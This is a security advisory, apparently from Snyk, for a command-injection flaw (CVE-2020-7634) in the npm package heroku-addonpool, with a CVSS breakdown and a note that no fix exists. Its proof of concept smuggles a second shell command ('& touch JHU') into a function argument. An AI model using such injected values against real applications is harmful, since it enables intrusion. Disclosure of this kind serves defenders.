Command Injection

Affecting heroku-addonpool package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

heroku-addonpool is a tool that Managing Addon Pool of an App in Heroku.

Affected versions of this package are vulnerable to Command Injection. The second parameter of the exported function HerokuAddonPool(id, app, opt) can be controlled by users without any sanitization.

PoC

var Root = require("heroku-addonpool");
var root = Root("sss","& touch JHU",{});
root.setup();

Remediation

There is no fixed version for heroku-addonpool.

References

CVSS Score

6.5
medium severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N/E:P/RL:O/RC:C
Credit
JHU System Security Lab
CVE
CVE-2020-7634
CWE
CWE-74
Snyk ID
SNYK-JS-HEROKUADDONPOOL-564428
Disclosed
05 Apr, 2020
Published
05 Apr, 2020